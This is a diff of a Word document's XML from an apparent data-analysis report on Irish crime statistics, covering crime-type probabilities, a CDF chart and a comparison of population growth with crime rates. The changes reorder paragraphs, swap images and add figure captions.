+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>To compare population growth and crime rates, we will filter the population dataframe to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> population by 1000 to account for the fact that the population is shown in thousands and crimes are shown in units.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>To compare the evolution of the population and crime rate, a line chart has been plotted.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5230AA5A" wp14:editId="2DA6064B">
-            <wp:extent cx="5575935" cy="1481053"/>
-            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
-            <wp:docPr id="833918731" name="Picture 1" descr="A computer code on a white background&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BFBF591" wp14:editId="44EF74E0">
+            <wp:extent cx="5570621" cy="1564028"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="191194753" name="Picture 2" descr="A graph and chart with lines&#10;&#10;Description automatically generated with medium confidence"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10236,23 +10660,36 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="833918731" name="Picture 1" descr="A computer code on a white background&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
+                    <pic:cNvPr id="191194753" name="Picture 2" descr="A graph and chart with lines&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId25" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5586542" cy="1483870"/>
+                      <a:ext cx="5583205" cy="1567561"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -10260,435 +10697,7 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:r>
-        <w:t>lowest probability:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60AFB009" wp14:editId="58CFEC44">
-            <wp:extent cx="5534343" cy="1471729"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1090165595" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1090165595" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5543457" cy="1474153"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Insights from this PFM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>The most common crime type is 67 "Theft and related offences", with a probability over 0.14.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The least common crime type is 34, "Infanticide", with probability of 2.08e-07 or </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>0.000000208</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The distribution of crime types is skewed, with a few </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>crime</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> types accounting for a large proportion of the total number of crimes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Exploring CDF</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234B2849" wp14:editId="0517E364">
-            <wp:extent cx="6120130" cy="4027805"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1624026734" name="Picture 1" descr="A graph of data on a white background&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1624026734" name="Picture 1" descr="A graph of data on a white background&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6120130" cy="4027805"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Figure 07 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">CDF of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Insights from the CDF:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The CDF chart shows that the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>VALUE</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> column is skewed to the right. This means that there are more values in the dataset that are greater than the median value than there are values that are less than the median value. The median value of the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>VALUE</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> column is approximately 10,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The CDF chart also shows that there are a small number of outliers in the dataset. Outliers are values that are much larger or smaller than the rest of the values in the dataset. The outliers in the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>VALUE</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> column are greater than 15,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Population Growth vs Crime Rate</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -10702,10 +10711,13 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10717,12 +10729,13 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">To compare population growth and crime rates, we will filter the population </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t>Figure 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10734,12 +10747,13 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10751,16 +10765,13 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t xml:space="preserve"> – Line Chart comparing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10772,10 +10783,13 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t>total crime</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10787,7 +10801,70 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> population by 1000 to account for the fact that the population is shown in thousands and crimes are shown in units.</w:t>
+        <w:t xml:space="preserve"> and population growth</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Insight</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:color="000000"/>
+        </w:rPr>
+        <w:t>From the figure above, we can see that the crime rate in Ireland has declined significantly over time, while the population has grown steadily.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:color="000000"/>
+        </w:rPr>
+        <w:t>This suggests that the crime rate in Ireland has declined even faster than the population has grown. This is a positive development.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Correlation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10795,196 +10872,9 @@
         <w:pStyle w:val="BodyA"/>
         <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
